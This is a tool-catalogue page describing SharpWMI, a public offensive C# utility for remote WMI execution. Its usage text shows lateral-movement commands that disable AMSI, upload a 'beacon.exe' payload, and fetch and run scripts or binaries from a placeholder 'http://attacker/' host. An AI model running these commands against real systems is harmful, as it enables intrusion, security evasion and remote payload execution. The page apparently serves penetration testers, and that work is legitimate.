Security Slice

SharpWMI

SharpWMI

Description

A C# implementation of various WMI functionality.

This implementation is a refurbished and enhanced version of original SharpWMI by @harmj0y that adds some more flexibility for working with malicious VBS scripts, AMSI evasion, file upload purely via WMI and makes it possible to return output from WMI remotely executed commands.

PlatformWindows
AuthorWill Schroeder
License3-Clause BSD
URLhttps://github.com/GhostPack/SharpWMI

Usage

USAGE:
  Local system enumeration:       
    SharpWMI.exe action=query query="select * from win32_service" [namespace=BLAH]
 
  Remote system enumeration:
    SharpWMI.exe action=query [computername=HOST1[,HOST2,...]] query="select * from win32_service" [namespace=BLAH]
 
  Remote system Logged On users enumeration:
    SharpWMI.exe action=loggedon [computername=HOST1[,HOST2,...]]
 
  Remote process creation:
    SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command="C:\\temp\\process.exe [args]" [amsi=disable] [result=true]
 
  Remote VBS execution:
    SharpWMI.exe action=executevbs [computername=HOST[,HOST2,...]] [script-specification] [eventname=blah] [amsi=disable] [time-specs]
 
  File upload via WMI:
    SharpWMI.exe action=upload [computername=HOST[,HOST2,...]] source="C:\\source\\file.exe" dest="C:\\temp\\dest-file.exe" [amsi=disable]
 
  Remote firewall enumeration :
    SharpWMI.exe action=firewall computername=HOST1[,HOST2,...]
 
  List processes:
    SharpWMI.exe action=ps [computername=HOST[,HOST2,...]]
 
  Terminate process (first found):
    SharpWMI.exe action=terminate process=PID|name [computername=HOST[,HOST2,...]]
 
  Get environment variables (all if name not given):
    SharpWMI.exe action=getenv [name=VariableName] [computername=HOST[,HOST2,...]]
 
  Set environment variable:
    SharpWMI.exe action=setenv name=VariableName value=VariableValue [computername=HOST[,HOST2,...]]
 
  Delete an environment variable:
    SharpWMI.exe action=delenv name=VariableName [computername=HOST[,HOST2,...]]
 
  Install MSI file:
    SharpWMI.exe action=install [computername=HOST[,HOST2,...]] path="C:\\temp\\installer.msi" [amsi=disable]
 
NOTE:
  - Any remote function also takes an optional "username=DOMAIN\\user" "password=Password123!".
  - If computername is not specified, will target localhost.
 
VBS Script execution:
  The 'executevbs' action was reworked as compared to the original version of SharpWMI.
  Script specification defined in [script-specification] offers following methods to point this tool at target VBS code:
 
  A) Executes OS command via preset VBS code:
    SharpWMI.exe action=executevbs [...] command="notepad.exe"
 
  B) Downloads Powershell commands from URL and execute them from within VBS via Powershell's StdIn:
    SharpWMI.exe action=executevbs [...] url="http://attacker/myscript.ps1"
 
  C) Download a binary file from given URL, store it in specified path and then execute it:
                                         url="SOURCE_URL,TARGET_PATH"
    SharpWMI.exe action=executevbs [...] url="http://attacker/foo.png,%TEMP%\bar.exe"
 
  D) Download a binary file from given URL, store it in specified path and then execute arbitrary command:
                                         url="SOURCE_URL,TARGET_PATH"
    SharpWMI.exe action=executevbs [...] url="http://attacker/foo.png,%TEMP%\bar.exe" command="%TEMP%\bar.exe -some -parameters"
 
  E) Read VBS script from file and execute it:
    SharpWMI.exe action=executevbs [...] script="myscript.vbs"
 
  F) Execute given VBS script given literally:
    SharpWMI.exe action=executevbs [...] script="CreateObject(\\"WScript.Shell\\").Run(\\"notepad.exe\\")"
 
  G) Base64 decode input string being encoded VBS script and execute it on remote machine:
    SharpWMI.exe action=executevbs [...] scriptb64="Q3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIi[...]"
 
  H) Read contents of given file, base64 decode them and then execute on target machine:
    SharpWMI.exe action=executevbs [...] scriptb64="myscript.vbs.b64"
 
  Finally, 'executevbs' action may have additional [time-specs] defined in seconds - they specify script trigger and wait timeouts:
    SharpWMI.exe action=executevbs [...] trigger=5 timeout=10
 
 
EXAMPLES:
 
  SharpWMI.exe action=query query="select * from win32_process"
 
  SharpWMI.exe action=query query="SELECT * FROM AntiVirusProduct" namespace="root\\SecurityCenter2"
 
  SharpWMI.exe action=loggedon computername=primary.testlab.local
 
  SharpWMI.exe action=query computername=primary.testlab.local query="select * from win32_service"
 
  SharpWMI.exe action=query computername=primary,secondary query="select * from win32_process"
 
  SharpWMI.exe action=exec computername=primary.testlab.local command="powershell.exe -enc ZQBj..."
 
  SharpWMI.exe action=exec computername=primary.testlab.local command="whoami" result=true amsi=disable
 
  SharpWMI.exe action=executevbs computername=primary.testlab.local command="notepad.exe" eventname="MyLittleEvent" amsi=disable
 
  SharpWMI.exe action=executevbs computername=primary.testlab.local username="TESTLAB\\harmj0y" password="Password123!"
 
  SharpWMI.exe action=upload computername=primary.testlab.local source="beacon.exe" dest="C:\\Windows\\temp\\foo.exe" amsi=disable
 
  SharpWMI.exe action=terminate computername=primary.testlab.local process=explorer
 
  SharpWMI.exe action=getenv name=PATH computername=primary.testlab.local
 
  SharpWMI.exe action=setenv name=FOO value="BAR" computername=primary.testlab.local
 
  SharpWMI.exe action=delenv name=FOO computername=primary.testlab.local
 
  SharpWMI.exe action=install computername=primary.testlab.local path="C:\\temp\\installer.msi"

Examples

Blog Posts